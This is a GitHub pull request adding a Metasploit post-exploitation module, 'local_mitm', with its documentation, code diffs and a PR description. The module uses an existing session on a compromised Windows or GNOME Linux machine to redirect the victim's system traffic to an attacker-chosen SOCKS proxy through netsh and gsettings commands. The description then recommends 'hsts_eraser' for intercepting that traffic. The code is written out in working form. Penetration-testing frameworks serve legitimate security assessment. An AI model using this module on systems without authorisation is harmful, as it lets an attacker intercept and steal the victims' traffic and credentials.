### PR TITLE
[GSOC] Local MITM

### DIFF
--- a/documentation/modules/post/multi/manage/local_mitm.rb
+++ b/documentation/modules/post/multi/manage/local_mitm.rb
@@ -1,0 +1,51 @@
+## Local MITM
+
+Change the proxy settings of the victim computer to the one provided by the user.
+
+## Vulnerable Application
+
+The following platforms are supported:
+
+
+* Windows (require administration privileges)
+* Linux
+
+
+## Verification Steps
+
+1. Get a session.
+2. `use post/multi/local_mitm`.
+3. Set the `SESSION` option.
+4. `set PRXHOST <proxy host>`.
+5. `set PRXPORT <proxy port>`.
+6. `run`.
+
+
+### Cleaning up
+
+1. `set action CLEANUP`.
+2. `run`.
+
+
+## Actions
+
+**INSTALL** (default)
+
+Update the proxy settings.
+
+
+**CLEANUP**
+
+Remove proxy settings.
+
+
+## Parameters
+
+**PRXHOST**
+
+Host of the proxy server, such as `123.45.67.89`.
+
+
+**PRXPORT**
+
+Port of the proxy server, such as `8080`.

--- a/modules/post/multi/manage/local_mitm.rb
+++ b/modules/post/multi/manage/local_mitm.rb
@@ -1,0 +1,41 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+
+  def initialize(info={})
+    super(update_info(info,
+        'Name'          => 'Free DonutZ', # GSOC 2018: module to get free modules
+        'Description'   => %q{
+          This module setup a local proxy on the victim computer so you can MITM it.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'Eliott Teissonniere' ],
+        'Platform'      => [ 'win', 'linux' ],
+        'SessionTypes'  => [ 'meterpreter', 'shell' ]
+    ))
+
+    register_options(
+      [
+        OptString.new('RHOST', [true, 'Host of the socks proxy server']),
+        OptString.new('RPORT', [true, 'Port of the socks proxy server'])
+      ])
+  end
+
+  def run
+    if session.platform == 'windows'
+      print_status('Windows detected, using netsh')
+      vprint_status cmd_exec("netsh winhttp set proxy proxy-server=\"socks=#{datastore["RHOST"]}:#{datastore["RPORT"]}\" bypass-list=\"<local>\"")
+    else
+      print_status('Linux detected, using gsettings')
+      vprint_status cmd_exec("gsettings set org.gnome.system.proxy mode 'manual'") # tell NetworkManager there is a proxy
+      vprint_status cmd_exec("gsettings set org.gnome.system.proxy.socks port #{datastore["RPORT"]}")
+      vprint_status cmd_exec("gsettings set org.gnome.system.proxy.socks host #{datastore["RHOST"]}")
+      vprint_status cmd_exec("gsettings set org.gnome.system.proxy ignore-hosts \"['localhost', '127.0.0.0/8', '::1']\"")
+    end
+  end
+end

--- a/modules/post/multi/manage/local_mitm.rb
+++ b/modules/post/multi/manage/local_mitm.rb
@@ -31,7 +31,12 @@ class MetasploitModule < Msf::Post
       print_status('Windows detected, using netsh')
       vprint_status cmd_exec("netsh winhttp set proxy proxy-server=\"socks=#{datastore["RHOST"]}:#{datastore["RPORT"]}\" bypass-list=\"<local>\"")
     else
-      print_status('Linux detected, using gsettings')
+      unless command_exists? 'gsettings'
+        return print_error('Gsettings is not available')
+      end
+
+      print_good('Gsettings available')
+
       vprint_status cmd_exec("gsettings set org.gnome.system.proxy mode 'manual'") # tell NetworkManager there is a proxy
       vprint_status cmd_exec("gsettings set org.gnome.system.proxy.socks port #{datastore["RPORT"]}")
       vprint_status cmd_exec("gsettings set org.gnome.system.proxy.socks host #{datastore["RHOST"]}")

--- a/modules/post/multi/manage/local_mitm.rb
+++ b/modules/post/multi/manage/local_mitm.rb
@@ -22,14 +22,20 @@ class MetasploitModule < Msf::Post
     register_options(
       [
         OptString.new('RHOST', [true, 'Host of the socks proxy server']),
-        OptString.new('RPORT', [true, 'Port of the socks proxy server'])
+        OptString.new('RPORT', [true, 'Port of the socks proxy server']),
+        OptBool.new('CLEANUP', [false, 'If we should remove the proxy instead of installing it'])
       ])
   end
 
   def run
     if session.platform == 'windows'
       print_status('Windows detected, using netsh')
-      vprint_status cmd_exec("netsh winhttp set proxy proxy-server=\"socks=#{datastore["RHOST"]}:#{datastore["RPORT"]}\" bypass-list=\"<local>\"")
+      
+      unless datastore['CLEANUP']
+        vprint_status cmd_exec("netsh winhttp set proxy proxy-server=\"socks=#{datastore["RHOST"]}:#{datastore["RPORT"]}\" bypass-list=\"<local>\"")
+      else
+        vprint_status cmd_exec('netsh winhttp reset proxy')
+      end
     else
       unless command_exists? 'gsettings'
         return print_error('Gsettings is not available')
@@ -37,10 +43,14 @@ class MetasploitModule < Msf::Post
 
       print_good('Gsettings available')
 
-      vprint_status cmd_exec("gsettings set org.gnome.system.proxy mode 'manual'") # tell NetworkManager there is a proxy
-      vprint_status cmd_exec("gsettings set org.gnome.system.proxy.socks port #{datastore["RPORT"]}")
-      vprint_status cmd_exec("gsettings set org.gnome.system.proxy.socks host #{datastore["RHOST"]}")
-      vprint_status cmd_exec("gsettings set org.gnome.system.proxy ignore-hosts \"['localhost', '127.0.0.0/8', '::1']\"")
+      unless datastore['CLEANUP']
+        vprint_status cmd_exec("gsettings set org.gnome.system.proxy mode 'manual'") # tell NetworkManager there is a proxy
+        vprint_status cmd_exec("gsettings set org.gnome.system.proxy.socks port #{datastore["RPORT"]}")
+        vprint_status cmd_exec("gsettings set org.gnome.system.proxy.socks host #{datastore["RHOST"]}")
+        vprint_status cmd_exec("gsettings set org.gnome.system.proxy ignore-hosts \"['localhost', '127.0.0.0/8', '::1']\"")
+      else
+        vprint_status cmd_exec('gsettings set org.gnome.system.proxy.mode "none"')
+      end
     end
   end
 end

--- a/modules/post/multi/manage/local_mitm.rb
+++ b/modules/post/multi/manage/local_mitm.rb
@@ -21,8 +21,8 @@ class MetasploitModule < Msf::Post
 
     register_options(
       [
-        Opt::RHOST,
-        Opt::RPORT(8080),
+        OptAddress.new('PRXHOST', [true, 'Address of the proxy server']),
+        OptPort.new('PRXPORT', [true, 'Port of the proxy server']),
         OptBool.new('CLEANUP', [false, 'If we should remove the proxy instead of installing it'])
       ])
   end

--- a/modules/post/multi/manage/local_mitm.rb
+++ b/modules/post/multi/manage/local_mitm.rb
@@ -9,14 +9,14 @@ class MetasploitModule < Msf::Post
 
   def initialize(info={})
     super(update_info(info,
-        'Name'          => 'Local MITM',
-        'Description'   => %q{
-          This module setup a local proxy on the victim computer so you can MITM it.
-        },
-        'License'       => MSF_LICENSE,
-        'Author'        => [ 'Eliott Teissonniere' ],
-        'Platform'      => [ 'win', 'linux' ],
-        'SessionTypes'  => [ 'meterpreter', 'shell' ]
+      'Name'          => 'Local MITM',
+      'Description'   => %q{
+        This module setup a local proxy on the victim computer so you can MITM it.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [ 'Eliott Teissonniere' ],
+      'Platform'      => [ 'win', 'linux' ],
+      'SessionTypes'  => [ 'meterpreter', 'shell' ]
     ))
 
     register_options(

--- a/modules/post/multi/manage/local_mitm.rb
+++ b/modules/post/multi/manage/local_mitm.rb
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Post
 
     if admin # For Windows
       vprint_status 'Verifying privileges'
-      
+
       unless is_admin?
         return print_error('Administrator or better privileges needed. Try "getsystem" first.')
       else

--- a/modules/post/multi/manage/local_mitm.rb
+++ b/modules/post/multi/manage/local_mitm.rb
@@ -9,7 +9,7 @@ class MetasploitModule < Msf::Post
 
   def initialize(info={})
     super(update_info(info,
-        'Name'          => 'Free DonutZ', # GSOC 2018: module to get free modules
+        'Name'          => 'Local MITM',
         'Description'   => %q{
           This module setup a local proxy on the victim computer so you can MITM it.
         },

--- a/modules/post/multi/manage/local_mitm.rb
+++ b/modules/post/multi/manage/local_mitm.rb
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Post
       else
         vprint_status cmd_exec('netsh winhttp reset proxy')
       end
-    else
+    elsif session.platform == 'linux'
       unless command_exists? 'gsettings'
         return print_error('Gsettings is not available')
       end
@@ -51,6 +51,8 @@ class MetasploitModule < Msf::Post
       else
         vprint_status cmd_exec('gsettings set org.gnome.system.proxy.mode "none"')
       end
+    else
+      print_error('Unsupported platform')
     end
   end
 end

--- a/modules/post/multi/manage/local_mitm.rb
+++ b/modules/post/multi/manage/local_mitm.rb
@@ -30,7 +30,7 @@ class MetasploitModule < Msf::Post
   def run
     if session.platform == 'windows'
       print_status('Windows detected, using netsh')
-      
+
       unless datastore['CLEANUP']
         vprint_status cmd_exec("netsh winhttp set proxy proxy-server=\"socks=#{datastore["RHOST"]}:#{datastore["RPORT"]}\" bypass-list=\"<local>\"")
       else

--- a/modules/post/multi/manage/local_mitm.rb
+++ b/modules/post/multi/manage/local_mitm.rb
@@ -45,6 +45,8 @@ class MetasploitModule < Msf::Post
     end
 
     if admin # For Windows
+      vprint_status 'Verifying privileges'
+      
       unless is_admin?
         return print_error('Administrator or better privileges needed. Try "getsystem" first.')
       else
@@ -60,11 +62,11 @@ class MetasploitModule < Msf::Post
   end
 
   def win_install
-    vcmd_exec("netsh winhttp set proxy proxy-server=\"socks=#{datastore["PRXHOST"]}:#{datastore["PRXPORT"]}\" bypass-list=\"<local>\"", admin=true)
+    vcmd_exec("netsh winhttp set proxy proxy-server=\"socks=#{datastore["PRXHOST"]}:#{datastore["PRXPORT"]}\" bypass-list=\"<local>\"", '', true)
   end
 
   def win_clean
-    vcmd_exec('netsh winhttp reset proxy', admin=true)
+    vcmd_exec('netsh winhttp reset proxy', '', true)
   end
 
   def linux_install

--- a/modules/post/multi/manage/local_mitm.rb
+++ b/modules/post/multi/manage/local_mitm.rb
@@ -21,8 +21,8 @@ class MetasploitModule < Msf::Post
 
     register_options(
       [
-        OptString.new('RHOST', [true, 'Host of the socks proxy server']),
-        OptString.new('RPORT', [true, 'Port of the socks proxy server']),
+        Opt::RHOST,
+        Opt::RPORT(8080),
         OptBool.new('CLEANUP', [false, 'If we should remove the proxy instead of installing it'])
       ])
   end


### PR DESCRIPTION
This PR is the latest one described in my proposal, its goal is to set a systemwide proxy so you MITM a computer in a remote network.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Get a session (**admin** on windows)
- [ ] `use post/multi/manage/local_mitm`
- [ ] `show actions`, to uninstall the proxy use `set ACTION CLEANUP`
- [ ] `set PRXHOST <proxy host>`
- [ ] `set PRXPORT <proxy port`
- [ ] `set SESSION <session>`
- [ ] `run`

This should configure a system proxy, now is a good time to start such server and maybe use `hsts_eraser` so you can intercept the traffic from the victim correctly!

## References

- Man In The Browser: https://en.wikipedia.org/wiki/Man-in-the-browser#Boy-in-the-browser
- Boy In The Browser: https://www.imperva.com/DefenseCenter/ThreatAdvisories/Boy_in_the_Browser